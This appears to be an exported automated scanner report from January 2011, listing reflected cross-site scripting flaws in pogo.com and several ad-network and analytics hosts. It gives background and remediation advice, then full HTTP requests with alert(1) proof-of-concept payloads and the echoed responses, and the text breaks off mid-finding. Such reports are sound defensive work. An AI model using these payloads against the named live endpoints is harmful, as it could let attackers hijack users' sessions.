http://www.pogo.com/ [f9258%22%3E%3Cscript%3Ealert(document.cookie parameter]
http://www.pogo.com/ [name of an arbitrarily supplied request parameter]
http://www.pogo.com/account/my-account/recover.do [name of an arbitrarily supplied request parameter]
http://www.pogo.com/action/pogo/createAccount.do [name of an arbitrarily supplied request parameter]
http://www.pogo.com/action/pogo/createAccount.do [pageSection parameter]
http://www.pogo.com/card-games [pageSection parameter]
http://www.pogo.com/home/home.jsp [f9258%22%3E%3Cscript%3Ealert(1 parameter]
http://www.pogo.com/home/home.jsp [f9258%22%3E%3Cscript%3Ealert(1 parameter]
http://www.pogo.com/home/home.jsp [name of an arbitrarily supplied request parameter]
http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [name of an arbitrarily supplied request parameter]
http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [name of an arbitrarily supplied request parameter]
http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [&intcmp parameter]
http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [intcmp parameter]
http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [pageSection parameter]
http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp [pageSection parameter]
http://www.pogo.com/prize/prize.do [name of an arbitrarily supplied request parameter]
http://www.pogo.com/prize/prize.do [pageSection parameter]
http://www.pogo.com/sitemap [name of an arbitrarily supplied request parameter]
https://www.pogo.com/action/pogo/signin.do [name of an arbitrarily supplied request parameter]
http://www.slidedeck.com/download [REST URL parameter 1]
http://www.slidedeck.com/usage-documentation [REST URL parameter 1]
http://www.thedailynews.cc/ [name of an arbitrarily supplied request parameter]
http://board-games.pogo.com/ [Referer HTTP header]
http://board-games.pogo.com/games/monopoly [Referer HTTP header]
http://board-games.pogo.com/games/online-chess [Referer HTTP header]
http://board-games.pogo.com/games/risk [Referer HTTP header]
http://card-games.pogo.com/ [Referer HTTP header]
http://card-games.pogo.com/games/rainy-day-spider-solitaire [Referer HTTP header]
http://clubpogo-games.pogo.com/ [Referer HTTP header]
http://flash-games.pogo.com/ [Referer HTTP header]
http://game3.pogo.com/error/java-problem.jsp [Referer HTTP header]
http://game3.pogo.com/exhibit/game/game.jsp [Referer HTTP header]
http://game3.pogo.com/exhibit/intermission.jsp [Referer HTTP header]
http://game3.pogo.com/exhibit/loading/loading.jsp [Referer HTTP header]
http://game3.pogo.com/exhibit/loading/loading.jsp [Referer HTTP header]
http://game3.pogo.com/room/game/autoplay-table.jsp [Referer HTTP header]
http://game3.pogo.com/room/game/chatshell.jsp [Referer HTTP header]
http://game3.pogo.com/room/game/controlshell.jsp [Referer HTTP header]
http://game3.pogo.com/room/game/dashshell.jsp [Referer HTTP header]
http://game3.pogo.com/room/game/frameset.jsp [Referer HTTP header]
http://game3.pogo.com/room/game/game.jsp [Referer HTTP header]
http://game3.pogo.com/room/game/gameshell.jsp [Referer HTTP header]
http://game3.pogo.com/room/loading/init.jsp [Referer HTTP header]
http://game3.pogo.com/room/loading/jvmtest.jsp [Referer HTTP header]
http://game3.pogo.com/room/loading/jvmtest.jsp [User-Agent HTTP header]
http://game3.pogo.com/room/loading/loading.jsp [Referer HTTP header]
http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header]
http://game3.pogo.com/room/loading/loading.jsp [User-Agent HTTP header]
http://game3.pogo.com/room/util/urlopen.jsp [Referer HTTP header]
http://game3.pogo.com/util/client-props.jsp [Referer HTTP header]
http://game3.pogo.com/v/11.1.9.13/applet/scrabble/ [Referer HTTP header]
http://game3.pogo.com/v/11.1.9.44/applet/jvmtest/ [Referer HTTP header]
http://puzzle-games.pogo.com/ [Referer HTTP header]
http://puzzle-games.pogo.com/games/bejeweled2 [Referer HTTP header]
http://rss.pogo.com/rss [Referer HTTP header]
http://word-games.pogo.com/ [Referer HTTP header]
http://word-games.pogo.com/games/scrabble [Referer HTTP header]
http://word-games.pogo.com/games/scrabble [Referer HTTP header]
http://www.bbc.co.uk/news/technology-12126880 [Referer HTTP header]
http://www.gamespot.com/ [Referer HTTP header]
http://www.pogo.com/ [Referer HTTP header]
http://www.pogo.com/ [Referer HTTP header]
http://www.pogo.com/account/my-account.do [Referer HTTP header]
http://www.pogo.com/account/my-account/confirm-recover-password.do [Referer HTTP header]
http://www.pogo.com/account/my-account/edit-checkout-settings.do [Referer HTTP header]
http://www.pogo.com/account/my-account/edit-checkout-settings.do [Referer HTTP header]
http://www.pogo.com/account/my-account/main.do [Referer HTTP header]
http://www.pogo.com/account/my-account/recover.do [Referer HTTP header]
http://www.pogo.com/account/my-account/recover.do [Referer HTTP header]
http://www.pogo.com/account/verify-password.do [Referer HTTP header]
http://www.pogo.com/account/verify-password.do [Referer HTTP header]
http://www.pogo.com/action/pogo/confirmation.do [Referer HTTP header]
http://www.pogo.com/action/pogo/createAccount.do [Referer HTTP header]
http://www.pogo.com/action/pogo/lightreg.do [Referer HTTP header]
http://www.pogo.com/action/pogo/lightregview.do [Referer HTTP header]
http://www.pogo.com/action/pogop/welcome.do [Referer HTTP header]
http://www.pogo.com/all-games [Referer HTTP header]
http://www.pogo.com/board-games [Referer HTTP header]
http://www.pogo.com/board-games [Referer HTTP header]
http://www.pogo.com/games/connect.jsp [Referer HTTP header]
http://www.pogo.com/home/home.jsp [Referer HTTP header]
http://www.pogo.com/hotdeploy/us/homepage/clubpogo-info.jsp [Referer HTTP header]
http://www.pogo.com/hotdeploy/us/promotions/marketing/bgca/landing-page.jsp [Referer HTTP header]
http://www.pogo.com/hotdeploy/us/promotions/marketing/pogoiphone/landing-page.jsp [Referer HTTP header]
http://www.pogo.com/hotdeploy/us/promotions/swf/sidenav/club-promo/CLP_holidayPD_lftNav_alt2 [Referer HTTP header]
http://www.pogo.com/img/prize/en_US/cash-giveaway [Referer HTTP header]
http://www.pogo.com/login/entry.jsp [Referer HTTP header]
http://www.pogo.com/login/pogo/setCookie.do [Referer HTTP header]
http://www.pogo.com/login/word-verification.jsp [Referer HTTP header]
http://www.pogo.com/news/us/latestnews/news-2010.jsp [Referer HTTP header]
http://www.pogo.com/news/us/netiquette/net-2009.jsp [Referer HTTP header]
http://www.pogo.com/news/us/winnerscircle/winners-2010.jsp [Referer HTTP header]
http://www.pogo.com/prize/prize.do [Referer HTTP header]
http://www.pogo.com/prize/prize.do [Referer HTTP header]
http://www.pogo.com/prize/rules.do [Referer HTTP header]
http://www.pogo.com/profiles/k7240 [Referer HTTP header]
http://www.pogo.com/puzzle-games [Referer HTTP header]
http://www.pogo.com/puzzle-games [Referer HTTP header]
http://www.pogo.com/sitemap [Referer HTTP header]
http://www.pogo.com/word-games [Referer HTTP header]
http://www.pogo.com/word-games [Referer HTTP header]
https://www.pogo.com/action/pogo/signin.do [Referer HTTP header]
https://www.pogo.com/action/pogop/heavyregview.do [Referer HTTP header]
https://www.pogo.com/action/pogop/welcome.do [Referer HTTP header]
https://www.pogo.com/surveys/processZipSubs.do [Referer HTTP header]
https://www.pogo.com/surveys/surveysofferssubs.do [Referer HTTP header]
http://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]
https://www.salesforce.com/servlet/servlet.WebToLead [Referer HTTP header]
http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [ruid cookie]
http://www.e00.peanutlabs.com/js/iFrame/index.php [pl_lang cookie]
http://www.peanutlabs.com/userGreeting.php [pl_lang cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f1a2"><script>alert(1)</script>29d113731ef was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=8f1a2"><script>alert(1)</script>29d113731ef HTTP/1.1
Host: ad.turn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8977556597757145533; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:03:23 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:03:23 GMT
Connection: close

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8977556597757145533&rnd=9049614191795073469&fpid=8f1a2"><script>alert(1)</script>29d113731ef&nu=y&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

3.2. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae48c'-alert(1)-'49d3e5006f8 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193ae48c'-alert(1)-'49d3e5006f8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:02:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:02:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 02:02:34 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193ae48c'-alert(1)-'49d3e5006f8&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

3.3. http://admeld.adnxs.com/usersync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c38'-alert(1)-'3fc1cb53627 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match16c38'-alert(1)-'3fc1cb53627 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:03:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:03:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 02:03:03 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match16c38'-alert(1)-'3fc1cb53627?admeld_adprovider_id=193&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

3.4. http://ads.adxpose.com/ads/ads.js [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b4f4c<script>alert(1)</script>a52e440cf62 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_261541b4f4c<script>alert(1)</script>a52e440cf62 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=93533324557B6D4C66B8D07696AFDC1E; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: evlu=075d4a72-84c6-47f7-8419-eab875d87006; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:56 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:01:49 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
SE_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_261541b4f4c<script>alert(1)</script>a52e440cf62".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_261541b4f4c<script>
...[SNIP]...

3.5. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f479"-alert(1)-"9f537d45c44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&1f479"-alert(1)-"9f537d45c44=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536160339719001&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:02:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 09 Jan 2011 02:02:46 GMT
Pragma: no-cache
Content-Length: 5050
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?1f479"-alert(1)-"9f537d45c44=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&s=1678185&_salt=2966712294";var RM_POP_COOKIE_NAME='ym
...[SNIP]...

3.6. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserving.cpxinteractive.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 645a9"-alert(1)-"c8cb9b7364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=ad&ad_size=728x90&section=628381\&645a9"-alert(1)-"c8cb9b7364=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 09 Jan 2011 02:03:52 GMT
Pragma: no-cache
Content-Length: 4334
Age: 0
Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?645a9"-alert(1)-"c8cb9b7364=1&Z=728x90&s=628381%5c&_salt=3434864609";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new
...[SNIP]...

3.7. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 5975c<script>alert(1)</script>1fdfc17438e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=85975c<script>alert(1)</script>1fdfc17438e&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:10 GMT
Date: Sun, 09 Jan 2011 02:02:10 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"85975c<script>alert(1)</script>1fdfc17438e", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.8. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 9a333<script>alert(1)</script>8a4c3dbbfb7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=1641219a333<script>alert(1)</script>8a4c3dbbfb7&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:14 GMT
Date: Sun, 09 Jan 2011 02:02:14 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"", c10:"1641219a333<script>alert(1)</script>8a4c3dbbfb7", c15:"", c16:"", r:""});

3.9. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 74eae<script>alert(1)</script>372646ead38 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=164121&c15=74eae<script>alert(1)</script>372646ead38 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:14 GMT
Date: Sun, 09 Jan 2011 02:02:14 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"", c10:"164121", c15:"74eae<script>alert(1)</script>372646ead38", c16:"", r:""});

3.10. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload ae5ba<script>alert(1)</script>adbfd959a51 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404ae5ba<script>alert(1)</script>adbfd959a51&c3=9&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:11 GMT
